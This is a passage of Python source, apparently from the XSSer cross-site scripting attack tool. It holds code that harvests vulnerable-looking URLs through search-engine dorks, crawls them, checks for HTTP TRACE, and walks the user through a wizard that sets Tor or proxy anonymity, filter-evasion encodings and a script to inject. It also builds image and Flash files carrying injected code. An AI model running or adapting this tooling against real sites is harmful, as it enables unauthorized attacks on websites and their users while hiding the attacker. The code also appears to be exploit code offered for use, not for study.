  2095.             self.report('='*75)
    2096. 

  2096.             self.report("Testing [XSS from DORK]... Good luck! ;-)")
    2097. 

  2097.             self.report('='*75)
    2098. 

  2098.             try:
    2099. 

  2099.                 f = open('core/fuzzing/dorks.txt')
    2100. 

  2100.                 dorks = f.readlines()
    2101. 

  2101.                 dorks = [ dork.replace('\n','') for dork in dorks ]
    2102. 

  2102.                 f.close()
    2103. 

  2103.                 if not dorks:
    2104. 

  2104.                     print("\n[Error] - Imposible to retrieve 'dorks' from file.\n")
    2105. 

  2105.                     return
    2106. 

  2106.             except:
    2107. 

  2107.                 if os.path.exists('core/fuzzing/dorks.txt') == True:
    2108. 

  2108.                     print('[Error] - Cannot open:', 'dorks.txt', "\n")
    2109. 

  2109.                     return 
    2110. 

  2110.                 else:
    2111. 

  2111.                     print('[Error] - Cannot found:', 'dorks.txt', "\n")
    2112. 

  2112.                     return
    2113. 

  2113.             if not options.dork_engine:
    2114. 

  2114.                 options.dork_engine = 'duck' # default search engine [26-08/2019]
    2115. 

  2115.             if options.dork_mass: # massive dorkering
    2116. 

  2116.                 for e in self.search_engines:
    2117. 

  2117.                     try:
    2118. 

  2118.                         dorker = Dorker(e)
    2119. 

  2119.                         for dork in dorks:
    2120. 

  2120.                             urls = dorker.dork(dork)
    2121. 

  2121.                         i = 0
    2122. 

  2122.                         for u in urls: # replace original parameter for injection keyword (XSS)
    2123. 

  2123.                             p_uri = urlparse(u)
    2124. 

  2124.                             uri = p_uri.netloc
    2125. 

  2125.                             path = p_uri.path
    2126. 

  2126.                             target_params = parse_qs(urlparse(u).query, keep_blank_values=True)
    2127. 

  2127.                             for key, value in target_params.items(): # parse params to apply keywords
    2128. 

  2128.                                 for v in value:
    2129. 

  2129.                                     target_params[key] = 'XSS'
    2130. 

  2130.                             target_url_params = urllib.parse.urlencode(target_params)
    2131. 

  2131.                             u = p_uri.scheme + "://" + uri + path + "?" + target_url_params
    2132. 

  2132.                             urls[i] = u
    2133. 

  2133.                             i = i + 1
    2134. 

  2134.                     except Exception as e:
    2135. 

  2135.                         for reporter in self._reporters:
    2136. 

  2136.                             reporter.mosquito_crashed(dorker.search_url, str(e.message))
    2137. 

  2137.                     else:
    2138. 

  2138.                         if urls is not None:
    2139. 

  2139.                             for url in urls:
    2140. 

  2140.                                 for reporter in self._reporters:
    2141. 

  2141.                                     reporter.add_link(dorker.search_url, url)
    2142. 

  2142.             else:
    2143. 

  2143.                 dorker = Dorker(options.dork_engine)
    2144. 

  2144.                 try:
    2145. 

  2145.                     for dork in dorks:
    2146. 

  2146.                         urls = dorker.dork(dork)
    2147. 

  2147.                     i = 0
    2148. 

  2148.                     for u in urls: # replace original parameter for injection keyword (XSS)
    2149. 

  2149.                         p_uri = urlparse(u)
    2150. 

  2150.                         uri = p_uri.netloc
    2151. 

  2151.                         path = p_uri.path
    2152. 

  2152.                         target_params = parse_qs(urlparse(u).query, keep_blank_values=True)
    2153. 

  2153.                         for key, value in target_params.items(): # parse params to apply keywords
    2154. 

  2154.                             for v in value:
    2155. 

  2155.                                 target_params[key] = 'XSS'
    2156. 

  2156.                         target_url_params = urllib.parse.urlencode(target_params)
    2157. 

  2157.                         u = p_uri.scheme + "://" + uri + path + "?" + target_url_params
    2158. 

  2158.                         urls[i] = u
    2159. 

  2159.                         i = i + 1
    2160. 

  2160.                 except Exception as e:
    2161. 

  2161.                     for reporter in self._reporters:
    2162. 

  2162.                         reporter.mosquito_crashed(dorker.search_url, str(e.message))
    2163. 

  2163.                 else:
    2164. 

  2164.                     if urls is not None:
    2165. 

  2165.                         for url in urls:
    2166. 

  2166.                             for reporter in self._reporters:
    2167. 

  2167.                                 reporter.add_link(dorker.search_url, url)
    2168. 

  2168.         if options.crawling: # crawlering target(s)
    2169. 

  2169.             nthreads = options.threads
    2170. 

  2170.             self.crawled_urls = list(urls)
    2171. 

  2171.             all_crawled = []
    2172. 

  2172.             try:
    2173. 

  2173.                 self.options.crawling = int(self.options.crawling)
    2174. 

  2174.             except:
    2175. 

  2175.                 self.options.crawling = 50
    2176. 

  2176.             if self.options.crawler_width == None:
    2177. 

  2177.                 self.options.crawler_width = 2 # default crawlering-width
    2178. 

  2178.             else:
    2179. 

  2179.                 try:
    2180. 

  2180.                     self.options.crawler_width = int(self.options.crawler_width)
    2181. 

  2181.                 except:
    2182. 

  2182.                     self.options.crawler_width = 2 # default crawlering-width
    2183. 

  2183.             if self.options.crawler_local == None:
    2184. 

  2184.                 self.options.crawler_local = False # default crawlering to LOCAL
    2185. 

  2185.             for url in set(urls):
    2186. 

  2186.                 self.report("\n[Info] Crawlering TARGET:", url, "\n\n   - Max. limit: "+ str(self.options.crawling)+ " \n   - Deep level: "+ str(options.crawler_width))
    2187. 

  2187.             crawler = Crawler(self, Curl, all_crawled,
    2188. 

  2188.                               self.pool)
    2189. 

  2189.             crawler.set_reporter(self)
    2190. 

  2190.             # now wait for all results to arrive
    2191. 

  2191.             while urls:
    2192. 

  2192.                 self.run_crawl(crawler, urls.pop(), options)
    2193. 

  2193.             while not self._landing:
    2194. 

  2194.                 for reporter in self._reporters:
    2195. 

  2195.                     reporter.report_state('broad scanning')
    2196. 

  2196.                 try:
    2197. 

  2197.                     self.pool.poll()
    2198. 

  2198.                 except NoResultsPending:
    2199. 

  2199.                     crawler.cancel()
    2200. 

  2200.                     break
    2201. 

  2201.                 if len(self.crawled_urls) >= int(options.crawling) or not crawler._requests:
    2202. 

  2202.                     self.report("\n[Info] Found enough results... calling all mosquitoes to home!")
    2203. 

  2203.                     crawler.cancel()
    2204. 

  2204.                     break
    2205. 

  2205.                 time.sleep(0.1)
    2206. 

  2206.             # re-parse crawled urls from main
    2207. 

  2207.             parsed_crawled_urls = []
    2208. 

  2208.             for u in self.crawled_urls:
    2209. 

  2209.                 if "XSS" in u:
    2210. 

  2210.                     parsed_crawled_urls.append(u)
    2211. 

  2211.                 else:
    2212. 

  2212.                     pass
    2213. 

  2213.             self.crawled_urls = parsed_crawled_urls
    2214. 

  2214.             # report parsed crawled urls
    2215. 

  2215.             self.report("\n" + "-"*25)
    2216. 

  2216.             self.report("\n[Info] Mosquitoes have found: [ " + str(len(self.crawled_urls)) + " ] possible attacking vector(s)")
    2217. 

  2217.             if self.options.verbose:
    2218. 

  2218.                 self.report("")
    2219. 

  2219.                 for u in self.crawled_urls:
    2220. 

  2220.                     if '/XSS' in u:
    2221. 

  2221.                         u = u.replace("/XSS", "")
    2222. 

  2222.                     print(" - " + str(u))
    2223. 

  2223.             if len(self.crawled_urls) > 0:
    2224. 

  2224.                 self.report("")
    2225. 

  2225.             else:
    2226. 

  2226.                 self.report("-"*25)
    2227. 

  2227.                 self.report("\n[Error] XSSer (or your TARGET) is not working properly...\n\n - Firewall\n - Proxy\n - Target offline\n - [?] ...\n")
    2228. 

  2228.             return self.crawled_urls
    2229. 

  2229. 

  2230.         if not options.imx or not options.flash or not options.xsser_gtk or not options.update:
    2231. 

  2231.             return urls
    2232. 

  2232.             
    2233. 

  2233.     def run_crawl(self, crawler, url, options):
    2234. 

  2234.         def _cb(request, result):
    2235. 

  2235.             pass
    2236. 

  2236. 

  2237.         def _error_cb(request, error):
    2238. 

  2238.             for reporter in self._reporters:
    2239. 

  2239.                 reporter.mosquito_crashed(url, str(error[0]))
    2240. 

  2240.             traceback.print_tb(error[2])
    2241. 

  2241. 

  2242.         def crawler_main(args):
    2243. 

  2243.             return crawler.crawl(*args)
    2244. 

  2244.         crawler.crawl(url, int(options.crawler_width),
    2245. 

  2245.                       int(options.crawling),options.crawler_local)
    2246. 

  2246.         
    2247. 

  2247.     def poll_workers(self):
    2248. 

  2248.         try:
    2249. 

  2249.             self.pool.poll()
    2250. 

  2250.         except NoResultsPending:
    2251. 

  2251.             pass
    2252. 

  2252. 

  2253.     def try_running(self, func, error, args=[]):
    2254. 

  2254.         """
    2255. 

  2255.         Try running a function and print some error if it fails and exists with
    2256. 

  2256.         a fatal error.
    2257. 

  2257.         """
    2258. 

  2258.         try:
    2259. 

  2259.             return func(*args)
    2260. 

  2260.         except Exception as e:
    2261. 

  2261.             self.report(error)
    2262. 

  2262.             if DEBUG:
    2263. 

  2263.                 traceback.print_exc()
    2264. 

  2264.  
    2265. 

  2265.     def check_trace(self):
    2266. 

  2266.         """
    2267. 

  2267.         Check for Cross Site Tracing (XST) vulnerability: 
    2268. 

  2268.             1) check HTTP TRACE method enabled (add 'Max-Forwards: 0' to curl command to bypass some 'Anti-antixst' web proxy rules) 
    2269. 

  2269.             2) check data sent on reply 
    2270. 

  2270.         """
    2271. 

  2271.         agents = [] # user-agents
    2272. 

  2272.         try:
    2273. 

  2273.             f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
    2274. 

  2274.         except:
    2275. 

  2275.             f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing
    2276. 

  2276.         for line in f:
    2277. 

  2277.             agents.append(line)
    2278. 

  2278.         agent = random.choice(agents).strip() # set random user-agent
    2279. 

  2279.         referer = '127.0.0.1'
    2280. 

  2280.         import subprocess, shlex
    2281. 

  2281.         self.report('='*75)
    2282. 

  2282.         self.report("\n[Info] Trying method: Cross Site Tracing (XST)\n")
    2283. 

  2283.         if self.options.xst:
    2284. 

  2284.             xst = subprocess.Popen(shlex.split('curl -q -s -i -m 30 -A ' + agent + ' -e ' + referer + ' -X TRACE ' + self.options.xst), stdout=subprocess.PIPE)
    2285. 

  2285.         if self.options.target:
    2286. 

  2286.             xst = subprocess.Popen(shlex.split('curl -q -s -i -m 30 -A ' + agent + ' -e ' + referer + ' -X TRACE ' + self.options.target), stdout=subprocess.PIPE)
    2287. 

  2287.         line1 = xst.stdout.readline()
    2288. 

  2288.         if self.options.verbose:
    2289. 

  2289.             print("-"*25 + "\n")
    2290. 

  2290.             while True:
    2291. 

  2291.                 line = xst.stdout.readline()
    2292. 

  2292.                 if line != '':
    2293. 

  2293.                     print(line.rstrip())
    2294. 

  2294.                 else:
    2295. 

  2295.                     break
    2296. 

  2296.             self.report("")
    2297. 

  2297.         self.report('-'*50+"\n")
    2298. 

  2298.         if "200 OK" in line1.rstrip():
    2299. 

  2299.             print("[Info] Target is vulnerable to XST! (Cross Site Tracing) ;-)\n")
    2300. 

  2300.         else:
    2301. 

  2301.             print("[Info] Target is NOT vulnerable to XST (Cross Site Tracing) ;-(\n")
    2302. 

  2302.         if self.options.target:
    2303. 

  2303.             self.report('='*75)
    2304. 

  2304.  
    2305. 

  2305.     def start_wizard(self):
    2306. 

  2306.         """
    2307. 

  2307.         Start Wizard Helper
    2308. 

  2308.         """
    2309. 

  2309.         #step 0: Menu
    2310. 

  2310.         ans1=True
    2311. 

  2311.         ans2=True
    2312. 

  2312.         ans3=True
    2313. 

  2313.         ans4=True
    2314. 

  2314.         ans5=True
    2315. 

  2315.         ans6=True
    2316. 

  2316. 

  2317.         #step 1: Where
    2318. 

  2318.         while ans1:
    2319. 

  2319.             print("""\nA)- Where are your targets?\n
    2320. 

  2320.              [1]- I want to enter the url of my target directly.
    2321. 

  2321.              [2]- I want to enter a list of targets from a .txt file.
    2322. 

  2322.             *[3]- I don't know where are my target(s)... I just want to explore! :-)
    2323. 

  2323.              [e]- Exit/Quit/Abort.
    2324. 

  2324.             """)
    2325. 

  2325.             ans1 = input("Your choice: [1], [2], [3] or [e]xit\n")
    2326. 

  2326.             if ans1 == "1": # from url
    2327. 

  2327.                 url = input("Target url (ex: http(s)://target.com): ")
    2328. 

  2328.                 if url.startswith("http"):
    2329. 

  2329.                     ans1 = None
    2330. 

  2330.                 else:
    2331. 

  2331.                     print("\n[Error] Your url is not valid!. Try again!")
    2332. 

  2332.                     pass
    2333. 

  2333.             elif ans1 == "2": # from file
    2334. 

  2334.                 url = input("Path to file (ex: 'targets_list.txt'): ")
    2335. 

  2335.                 if url == None:
    2336. 

  2336.                     print("\n[Error] Your are not providing a valid file. Try again!")
    2337. 

  2337.                     pass
    2338. 

  2338.                 else:
    2339. 

  2339.                     ans1 = None
    2340. 

  2340.             elif ans1 == "3": # dorking
    2341. 

  2341.                 url = "DORKING" 
    2342. 

  2342.                 ans1 = None
    2343. 

  2343.             elif (ans1 == "e" or ans1 == "E"):
    2344. 

  2344.                 print("Closing wizard...")
    2345. 

  2345.                 ans1=None
    2346. 

  2346.                 ans2=None
    2347. 

  2347.                 ans3=None
    2348. 

  2348.                 ans4=None
    2349. 

  2349.                 ans5=None
    2350. 

  2350.                 ans6=None
    2351. 

  2351.             else:
    2352. 

  2352.                 print("\nNot valid choice. Try again!")
    2353. 

  2353. 

  2354.         #step 2: How
    2355. 

  2355.         while ans2:
    2356. 

  2356.             print(22*"-")
    2357. 

  2357.             print("""\nB)- How do you want to connect?\n
    2358. 

  2358.              [1]- I want to connect using GET and select some possible vulnerable parameter(s) directly.
    2359. 

  2359.              [2]- I want to connect using POST and select some possible vulnerable parameter(s) directly.
    2360. 

  2360.              [3]- I want to "crawl" all the links of my target(s) to found as much vulnerabilities as possible.
    2361. 

  2361.             *[4]- I don't know how to connect... Just do it! :-)
    2362. 

  2362.              [e]- Exit/Quit/Abort.
    2363. 

  2363.             """)
    2364. 

  2364.             ans2 = input("Your choice: [1], [2], [3], [4] or [e]xit\n")
    2365. 

  2365.             if ans2 == "1": # using GET
    2366. 

  2366.                 payload = input("GET payload (ex: '/menu.php?q='): ")
    2367. 

  2367.                 if payload == None:
    2368. 

  2368.                     print("\n[Error] Your are providing an empty payload. Try again!")
    2369. 

  2369.                     pass
    2370. 

  2370.                 else:
    2371. 

  2371.                     self.user_template_conntype = "GET"
    2372. 

  2372.                     ans2 = None
    2373. 

  2373.             elif ans2 == "2": # using POST
    2374. 

  2374.                 payload = input("POST payload (ex: 'foo=1&bar='): ")
    2375. 

  2375.                 if payload == None:
    2376. 

  2376.                     print("\n[Error] Your are providing an empty payload. Try again!")
    2377. 

  2377.                     pass
    2378. 

  2378.                 else:
    2379. 

  2379.                     self.user_template_conntype = "POST"
    2380. 

  2380.                     ans2 = None
    2381. 

  2381.             elif ans2 == "3": # crawlering
    2382. 

  2382.                 payload = "CRAWLER" 
    2383. 

  2383.                 ans2 = None
    2384. 

  2384.             elif ans2 == "4": # crawlering
    2385. 

  2385.                 payload = "CRAWLER"
    2386. 

  2386.                 ans2 = None
    2387. 

  2387.             elif (ans2 == "e" or ans2 == "E"):
    2388. 

  2388.                 print("Closing wizard...")
    2389. 

  2389.                 ans2=None
    2390. 

  2390.                 ans3=None
    2391. 

  2391.                 ans4=None
    2392. 

  2392.                 ans5=None
    2393. 

  2393.                 ans6=None
    2394. 

  2394.             else:
    2395. 

  2395.                 print("\nNot valid choice. Try again!")
    2396. 

  2396. 

  2397.         #step 3: Proxy
    2398. 

  2398.         while ans3:
    2399. 

  2399.             print(22*"-")
    2400. 

  2400.             print("""\nC)- Do you want to be 'anonymous'?\n
    2401. 

  2401.              [1]- Yes. I want to use my proxy and apply automatic spoofing methods.
    2402. 

  2402.              [2]- Anonymous?. Yes!!!. I have a TOR proxy ready at: http://127.0.0.1:8118. 
    2403. 

  2403.             *[3]- Yes. But I haven't any proxy. :-)
    2404. 

  2404.              [4]- No. It's not a problem for me to connect directly to the target(s).
    2405. 

  2405.              [e]- Exit/Quit.
    2406. 

  2406.             """)
    2407. 

  2407.             ans3 = input("Your choice: [1], [2], [3], [4] or [e]xit\n")
    2408. 

  2408.             if ans3 == "1": # using PROXY + spoofing
    2409. 

  2409.                 proxy = input("Enter proxy [http(s)://server:port]: ")
    2410. 

  2410.                 ans3 = None
    2411. 

  2411.             elif ans3 == "2": # using TOR + spoofing
    2412. 

  2412.                 proxy = 'Using TOR (default: http://127.0.0.1:8118)'
    2413. 

  2413.                 proxy = 'http://127.0.0.1:8118'
    2414. 

  2414.                 ans3 = None
    2415. 

  2415.             elif ans3 == "3": # only spoofing
    2416. 

  2416.                 proxy = 'Proxy: No - Spoofing: Yes' 
    2417. 

  2417.                 ans3 = None
    2418. 

  2418.             elif ans3 == "4": # no spoofing
    2419. 

  2419.                 proxy = 'Proxy: No - Spoofing: No'
    2420. 

  2420.                 ans3 = None
    2421. 

  2421.             elif (ans3 == "e" or ans3 == "E"):
    2422. 

  2422.                 print("Closing wizard...")
    2423. 

  2423.                 ans3=None
    2424. 

  2424.                 ans4=None
    2425. 

  2425.                 ans5=None
    2426. 

  2426.                 ans6=None
    2427. 

  2427.             else:
    2428. 

  2428.                 print("\nNot valid choice. Try again!")
    2429. 

  2429. 

  2430.         #step 4: Bypasser(s)
    2431. 

  2431.         while ans4:
    2432. 

  2432.             print(22*"-")
    2433. 

  2433.             print("""\nD)- Which 'bypasser(s' do you want to use?\n
    2434. 

  2434.              [1]- I want to inject XSS scripts without any encoding.
    2435. 

  2435.              [2]- Try to inject code using 'Hexadecimal'.
    2436. 

  2436.              [3]- Try to inject code mixing 'String.FromCharCode()' and 'Unescape()'.
    2437. 

  2437.              [4]- I want to inject using 'Character Encoding Mutations' (Une+Str+Hex). 
    2438. 

  2438.             *[5]- I don't know exactly what is a 'bypasser'... But I want to inject code! :-)
    2439. 

  2439.              [e]- Exit/Quit.
    2440. 

  2440.             """)
    2441. 

  2441.             ans4 = input("Your choice: [1], [2], [3], [4], [5] or [e]xit\n")
    2442. 

  2442.             if ans4 == "1": # no encode
    2443. 

  2443.                 enc = "Not using encoders"
    2444. 

  2444.                 ans4 = None
    2445. 

  2445.             elif ans4 == "2": # enc: Hex
    2446. 

  2446.                 enc = 'Hex'
    2447. 

  2447.                 ans4 = None
    2448. 

  2448.             elif ans4 == "3": # enc: Str+Une
    2449. 

  2449.                 enc = 'Str+Une' 
    2450. 

  2450.                 ans4 = None
    2451. 

  2451.             elif ans4 == "4": # enc: Mix: Une+Str+Hex
    2452. 

  2452.                 enc = "Une,Str,Hex"
    2453. 

  2453.                 ans4 = None
    2454. 

  2454.             elif ans4 == "5": # enc: no encode
    2455. 

  2455.                 enc = 'Not using encoders' 
    2456. 

  2456.                 ans4 = None
    2457. 

  2457.             elif (ans4 == "e" or ans4 == "E"):
    2458. 

  2458.                 print("Closing wizard...")
    2459. 

  2459.                 ans4=None
    2460. 

  2460.                 ans5=None
    2461. 

  2461.                 ans6=None
    2462. 

  2462.             else:
    2463. 

  2463.                 print("\nNot valid choice. Try again!")
    2464. 

  2464. 

  2465.         #step 5: Exploiting
    2466. 

  2466.         while ans5:
    2467. 

  2467.             print(22*"-")
    2468. 

  2468.             print("""\nE)- Which final code do you want to 'exploit' on vulnerabilities found?\n
    2469. 

  2469.              [1]- I want to inject a classic "Alert" message box.
    2470. 

  2470.              [2]- I want to inject my own scripts.
    2471. 

  2471.             *[3]- I don't want to inject a final code... I just want to discover vulnerabilities! :-)
    2472. 

  2472.              [e]- Exit/Quit.
    2473. 

  2473.             """)
    2474. 

  2474.             ans5 = input("Your choice: [1], [2], [3] or [e]xit\n")
    2475. 

  2475.             if ans5 == "1": # alertbox
    2476. 

  2476.                 script = 'Alertbox'
    2477. 

  2477.                 ans5 = None
    2478. 

  2478.             elif ans5 == "2": # manual
    2479. 

  2479.                 script = input("Enter code (ex: '><script>alert('XSS');</script>): ")
    2480. 

  2480.                 if script == None:
    2481. 

  2481.                     print("\n[Error] Your are providing an empty script to inject. Try again!")
    2482. 

  2482.                     pass
    2483. 

  2483.                 else:
    2484. 

  2484.                     ans5 = None
    2485. 

  2485.             elif ans5 == "3": # no exploit
    2486. 

  2486.                 script = 'Not exploiting code' 
    2487. 

  2487.                 ans5 = None
    2488. 

  2488.             elif (ans5 == "e" or ans5 == "E"):
    2489. 

  2489.                 print("Closing wizard...")
    2490. 

  2490.                 ans5=None
    2491. 

  2491.                 ans6=None
    2492. 

  2492.             else:
    2493. 

  2493.                 print("\nNot valid choice. Try again!")
    2494. 

  2494. 

  2495.         #step 6: Final
    2496. 

  2496.         while ans6:
    2497. 

  2497.             print(22*"-")
    2498. 

  2498.             print("\nVery nice!. That's all. Your last step is to -accept or not- this template.\n")
    2499. 

  2499.             print("A)- Target:", url)
    2500. 

  2500.             print("B)- Payload:", payload)
    2501. 

  2501.             print("C)- Privacy:", proxy)
    2502. 

  2502.             print("D)- Bypasser(s):", enc)
    2503. 

  2503.             print("E)- Final:", script)
    2504. 

  2504.             print("""
    2505. 

  2505.             [Y]- Yes. Accept it and start testing!.
    2506. 

  2506.             [N]- No. Abort it?.
    2507. 

  2507.             """)
    2508. 

  2508.             ans6 = input("Your choice: [Y] or [N]\n")
    2509. 

  2509.             if (ans6 == "y" or ans6 == "Y"): # YES
    2510. 

  2510.                 start = 'YES'
    2511. 

  2511.                 print('Good fly... and happy "Cross" hacking !!! :-)\n')
    2512. 

  2512.                 ans6 = None
    2513. 

  2513.             elif (ans6 == "n" or ans6 == "N"): # NO
    2514. 

  2514.                 start = 'NO'
    2515. 

  2515.                 print("Aborted!. Closing wizard...")
    2516. 

  2516.                 ans6 = None
    2517. 

  2517.             else:
    2518. 

  2518.                 print("\nNot valid choice. Try again!")
    2519. 

  2519.             if url and payload and proxy and enc and script:
    2520. 

  2520.                 return url, payload, proxy, enc, script
    2521. 

  2521.             else:
    2522. 

  2522.                 return
    2523. 

  2523. 

  2524.     def create_fake_image(self, filename, payload):
    2525. 

  2525.         """
    2526. 

  2526.         Create -fake- image with code injected
    2527. 

  2527.         """
    2528. 

  2528.         options = self.options
    2529. 

  2529.         filename = options.imx
    2530. 

  2530.         payload = options.script
    2531. 

  2531.         image_xss_injections = ImageInjections()
    2532. 

  2532.         image_injections = image_xss_injections.image_xss(options.imx , options.script)
    2533. 

  2533.         return image_injections
    2534. 

  2534. 

  2535.     def create_fake_flash(self, filename, payload):
    2536. 

  2536.         """
    2537. 

  2537.         Create -fake- flash movie (.swf) with code injected
    2538. 

  2538.     	"""
    2539. 

  2539.         options = self.options
    2540. 

  2540.         filename = options.flash
    2541. 

  2541.         payload = options.script
    2542. 

  2542.         flash_xss_injections = FlashInjections()
    2543. 

  2543.         flash_injections = flash_xss_injections.flash_xss(options.flash, options.script)
    2544. 

  2544.         return flash_injections
    2545. 

  2545. 

  2546.     def create_gtk_interface(self):
    2547. 

  2547.         """
    2548. 

  2548.         Create GTK Interface
    2549. 

  2549.         """
    2550. 

  2550.         options = self.options
    2551. 

  2551.         from core.gtkcontroller import Controller, reactor
    2552. 

  2552.         uifile = "xsser.ui"
    2553. 

  2553.         controller = Controller(uifile, self)
    2554. 

  2554.         self._reporters.append(controller)
    2555. 

  2555.         if reactor:
    2556. 

  2556.             reactor.run()
    2557. 

  2557.         else:
    2558. 

  2558.             from gi.repository import Gtk
    2559. 

  2559.             Gtk.main()
    2560. 

  2560.         return controller
    2561. 

  2561. 

  2562.     def run(self, opts=None):
    2563. 

  2563.         """
    2564. 

  2564.         Run xsser.
    2565. 

  2565.         """
    2566. 

  2566.         #self._landing = False
    2567. 

  2567.         for reporter in self._reporters:
    2568. 

  2568.             reporter.start_attack()
    2569. 

  2569.         if opts:
    2570. 

  2570.             options = self.create_options(opts)
    2571. 

  2571.             self.set_options(options)
    2572. 

  2572.         if not self.mothership and not self.hub:
    2573. 

  2573.             self.hub = HubThread(self)
    2574. 

  2574.             self.hub.start()
    2575. 

  2575.         options = self.options
    2576. 

  2576.         if options:
    2577. 

  2577.             # step -1; order attacks
    2578. 

  2578.             if self.options.hash is True: # not fuzzing/heuristic when hash precheck
    2579. 

  2579.                 self.options.fuzz = False
    2580. 

  2580.                 self.options.script = False
    2581. 

  2581.                 self.options.coo = False
    2582. 

  2582.                 self.options.xsa = False
    2583. 

  2583.                 self.options.xsr = False
    2584. 

  2584.                 self.options.dcp = False
    2585. 

  2585.                 self.options.dom = False
    2586. 

  2586.                 self.options.inducedcode = False
    2587. 

  2587.                 self.options.heuristic = False
    2588. 

  2588.             if self.options.heuristic: # not fuzzing/hash when heuristic precheck
    2589. 

  2589.                 self.options.fuzz = False
    2590. 

  2590.                 self.options.script = False
    2591. 

  2591.                 self.options.coo = False
    2592. 

  2592.                 self.options.xsa = False
    2593. 

  2593.                 self.options.xsr = False
    2594. 

  2594.                 self.options.dcp = False
    2595. 

  2595.                 self.options.dom = False
    2596. 

  2596.                 self.options.inducedcode = False
    2597. 

  2597.                 self.options.hash = False
    2598. 

  2598.             if self.options.Cem: # parse input at CEM for blank spaces
    2599. 

  2599.                 self.options.Cem = self.options.Cem.replace(" ","")
    2600. 

  2600.         else:
    2601. 

  2601.             pass
    2602. 

  2602.         # step 0: third party tricks
    2603. 

  2603.         try:
    2604. 

  2604.             if self.options.imx: # create -fake- image with code injected
    2605. 

  2605.                 p = self.optionParser
    2606. 

  2606.                 self.report('='*75)
    2607. 

  2607.                 self.report(str(p.version))
    2608. 

  2608.                 self.report('='*75)
    2609. 

  2609.                 self.report("[Image XSS Builder]...")
    2610. 

  2610.                 self.report('='*75)
    2611. 

  2611.                 self.report(''.join(self.create_fake_image(self.options.imx, self.options.script)))
    2612. 

  2612.                 self.report('='*75 + "\n")
    2613. 

  2613.         except:
    2614. 

  2614.             return
    2615. 

  2615. 

  2616.         if options.flash: # create -fake- flash movie (.swf) with code injected
    2617. 

  2617.             p = self.optionParser
    2618. 

  2618.             self.report('='*75)
    2619. 

  2619.             self.report(str(p.version))
    2620. 

  2620.             self.report('='*75)
    2621. 

  2621.             self.report("[Flash Attack! XSS Builder]...")
    2622. 

  2622.             self.report('='*75)
    2623. 

  2623.             self.report(''.join(self.create_fake_flash(self.options.flash, self.options.script)))
    2624. 

  2624.             self.report('='*75 + "\n")
    2625. 

  2625. 

  2626.         if options.xsser_gtk:
    2627. 

  2627.             self.create_gtk_interface()
    2628. 

  2628.             return
    2629. 

  2629. 

  2630.         if self.options.wizard: # start a wizard helper
    2631. 

  2631.             p = self.optionParser
    2632. 

  2632.             self.report('='*75)
    2633. 

  2633.             self.report(str(p.version))
    2634. 

  2634.             self.report('='*75)
    2635. 

  2635.             self.report("[Wizard] Generating XSS attack...")
    2636. 

  2636.             self.report('='*75)
    2637. 

  2637.             self.user_template = self.start_wizard()
    2638. 

  2638. 

  2639.         if self.options.xst: # check for cross site tracing
    2640. 

  2640.             p = self.optionParser
    2641. 

  2641.             if not self.options.target:
    2642. 

  2642.                 self.report('='*75)
    2643. 

  2643.                 self.report(str(p.version))
    2644. 

  2644.                 self.report('='*75)
    2645. 

  2645.                 self.report("[XST Attack!] checking for HTTP TRACE method ...")
    2646. 

  2646.                 self.report('='*75)
    2647. 

  2647.             self.check_trace()
    2648. 

  2648. 

  2649.         if options.checktor:
    2650. 

  2650.             url = self.check_tor_url # TOR status checking site
    2651. 

  2651.             print('='*75)
    2652. 

  2652.             print("")
    2653. 

  2653.             print("        _                         ")
    2654. 

  2654.             print("       /_/_      .'''.            ")
    2655. 

  2655.             print("    =O(_)))) ...'     `.          ")
    2656. 

  2656.             print("       \_\              `.    .'''")
    2657. 

  2657.             print("                          `..'    ") 
    2658. 

  2658.             print("")
    2659. 

  2659.             print('='*75)
    2660. 

  2660.             agents = [] # user-agents
    2661. 

  2661.             try:
    2662. 

  2662.                 f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
    2663. 

  2663.             except:
    2664. 

  2664.                 f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing
    2665. 

  2665.             for line in f:
    2666. 

  2666.                 agents.append(line)
    2667. 

  2667.             agent = random.choice(agents).strip() # set random user-agent
    2668. 

  2668.             referer = "127.0.0.1"
    2669. 

  2669.             print("\nSending request to: " + url + "\n")
    2670. 

  2670.             print("-"*25+"\n")
    2671. 

  2671.             headers = {'User-Agent' : agent, 'Referer' : referer} # set fake user-agent and referer
    2672. 

  2672.             try:
    2673. 

  2673.                 import urllib.request, urllib.error, urllib.parse
    2674. 

  2674.                 req = urllib.request.Request(url, None, headers)
    2675. 

  2675.                 tor_reply = urllib.request.urlopen(req).read()
    2676. 

  2676.                 your_ip = tor_reply.split('<strong>')[1].split('</strong>')[0].strip() # extract public IP
    2677. 

  2677.                 if not tor_reply or 'Congratulations' not in tor_reply:
    2678. 

  2678.                     print("It seems that Tor is not properly set.\n")
    2679. 

  2679.                     print(("IP address appears to be: " + your_ip + "\n"))
    2680. 

  2680.                 else:
    2681. 

  2681.                     print("Congratulations!. Tor is properly being used :-)\n")
    2682. 

  2682.                     print(("IP address appears to be: " + your_ip + "\n"))
    2683. 

  2683.             except:
    2684. 

  2684.                 print("[Error] Cannot reach TOR checker system!. Are you connected?\n")
    2685. 

  2685.                 sys.exit(2) # return
    2686. 

  2686. 

  2687.         nthreads = max(1, abs(options.threads))
    2688. 

  2688.         nworkers = len(self.pool.workers)
    2689. 

  2689.         if nthreads != nworkers:
    2690. 

  2690.             if nthreads < nworkers:
    2691. 

  2691.                 self.pool.dismissWorkers(nworkers-nthreads)
    2692. 

  2692.             else:
    2693. 

  2693.                 self.pool.createWorkers(nthreads-nworkers)
    2694. 

  2694. 

  2695.         for reporter in self._reporters:
    2696. 

  2696.             reporter.report_state('scanning')
    2697. 

  2697.         
    2698. 

  2698.         # step 1: get urls
    2699. 

  2699.         urls = self.try_running(self._get_attack_urls, "\n[Error] Internal error getting -targets-\n")
    2700. 

  2700.         for reporter in self._reporters:
    2701. 

  2701.             reporter.report_state('arming')
    2702. 

  2702.         
    2703. 

  2703.         # step 2: get payloads
    2704. 

  2704.         payloads = self.try_running(self.get_payloads, "\n[Error] Internal error getting -payloads-\n")
    2705. 

  2705.         for reporter in self._reporters:
    2706. 

  2706.             reporter.report_state('cloaking')
    2707. 

  2707.         if options.Dwo:
    2708. 

  2708.             payloads = self.process_payloads_ipfuzzing(payloads)
    2709. 

  2709.         elif options.Doo:
    2710. 

  2710.             payloads = self.process_payloads_ipfuzzing_octal(payloads)
    2711. 

  2711.         for reporter in self._reporters:
    2712. 

